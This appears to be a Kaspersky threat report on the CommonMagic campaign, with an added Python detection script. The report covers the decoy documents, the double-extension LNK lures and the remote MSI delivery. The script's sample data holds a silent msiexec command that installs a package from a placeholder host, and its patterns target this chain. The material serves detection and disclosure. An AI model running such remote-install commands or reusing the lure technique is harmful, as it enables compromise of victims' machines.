

Since the start of the Russo-Ukrainian conflict, Kaspersky researchers and the international community at large have identified a significant number of cyberattacks executed in a political and geopolitical context. We previously published an overview of cyber activities and the threat landscape related to the conflict between Russia and Ukraine and continue to monitor new threats in these regions.

In October 2022, we identified an active infection of government, agriculture and transportation organizations located in the Donetsk, Lugansk, and Crimea regions. Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods. The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server. The archive, in turn, contained two files:

- A decoy document (we discovered PDF, XLSX and DOCX versions).
- A malicious LNK file with a double extension (e.g. .pdf.lnk) that leads to infection when opened.

Decoy Word document (subject: Results of the State Duma elections in the Republic of Crimea)

In several cases, the contents of the decoy document were directly related to the name of the malicious LNK to trick the user into activating it. For example, one archive contained an LNK file named “Приказ Минфина ДНР № 176” (Ministry of Finance Decree No. 176), and the decoy document explicitly referenced it by name in the text.

Decoy PDF with reference to a malicious shortcut file (subject: information about DPR Ministry of Finance Decree No. 176)

When the potential victim activates the LNK file included in the ZIP file, it triggers a chain of events that lead to the infection of the computer with a previously unseen malicious framework that we named CommonMagic. The ZIP files were downloaded from various locations hosted on two domains: webservice-srv[.]online and webservice-srv1[.]online.

The malicious LNK points to a remotely hosted malicious MSI file that is downloaded and started by the Windows Installer executable. The malware and techniques used in this campaign are not particularly sophisticated, but are effective, and the code has no direct relation to any known campaigns.
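The infection chain described above has two observable points a defender can check for without executing anything: a ZIP archive whose members include a shortcut hiding behind a document extension (e.g. .pdf.lnk), and a Windows Installer process (msiexec.exe) launched with a remote package URL rather than a local file. The following script, an added example that is not Kaspersky's code and not part of the original post, implements both checks. The archive contents, file names, process-event field names (Sysmon-style `Image`, `CommandLine`, `ParentImage`) and URLs are all constructed for illustration.

```python
"""Triage checks for the ZIP -> double-extension LNK -> remote MSI chain.

Added example (not Kaspersky's code). Sample archive and log events below are
constructed; field names follow a Sysmon-like layout and are an assumption.
"""
import io
import re
import zipfile

# Document extensions a decoy-looking shortcut would place before the real ".lnk".
DOCUMENT_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx")


def find_double_extension_lnks(zip_bytes: bytes) -> list:
    """Return archive member names that end in .lnk but look like a document
    (e.g. 'order.pdf.lnk'). Only the central directory is read; nothing is
    extracted or executed."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            lower = name.lower()
            if not lower.endswith(".lnk"):
                continue
            stem = lower[:-len(".lnk")]
            if stem.endswith(DOCUMENT_EXTS):
                hits.append(name)
    return hits


# Matches an http/https URL inside a command line, stopping at whitespace or quotes.
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def flag_remote_msiexec(events: list) -> list:
    """Flag process-creation events where msiexec.exe is started with a remote
    package URL. Explorer as the parent is consistent with a user opening a
    shortcut, so the parent image is reported for the analyst."""
    flagged = []
    for ev in events:
        image = ev.get("Image", "").lower()
        if not image.endswith("\\msiexec.exe"):
            continue
        match = REMOTE_URL.search(ev.get("CommandLine", ""))
        if match is None:
            continue  # local .msi path: ordinary software installation
        flagged.append({
            "pid": ev.get("ProcessId"),
            "url": match.group(0),
            "parent": ev.get("ParentImage", ""),
        })
    return flagged


def build_sample_zip() -> bytes:
    """Constructed archive mimicking the decoy + shortcut layout (file bodies are dummy)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("decoy.docx", b"not a real document")
        zf.writestr("order.pdf.lnk", b"not a real shortcut")
        zf.writestr("setup.lnk", b"plain shortcut, no masquerade")
    return buf.getvalue()


# Constructed process-creation events; payload.example is a placeholder host.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": "C:\\Windows\\System32\\msiexec.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": 'msiexec.exe /i "http://payload.example/update.msi" /qn'},
    {"ProcessId": 4188, "Image": "C:\\Windows\\System32\\msiexec.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": 'msiexec.exe /i "C:\\Users\\user\\Downloads\\vendor.msi"'},
    {"ProcessId": 4200, "Image": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": 'WINWORD.EXE "http://intranet.example/report.docx"'},
]

if __name__ == "__main__":
    print("masquerading shortcuts:", find_double_extension_lnks(build_sample_zip()))
    for hit in flag_remote_msiexec(SAMPLE_EVENTS):
        print("remote MSI install: pid=%s url=%s parent=%s" % (hit["pid"], hit["url"], hit["parent"]))
```

Both checks are deliberately narrow: the archive check only reads member names, so it is safe to run on a quarantined sample, and the process check ignores msiexec runs against local paths so that routine installations are not flagged. Real telemetry will use whatever field names your EDR or Sysmon configuration emits; the keys above are placeholders to be mapped accordingly.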
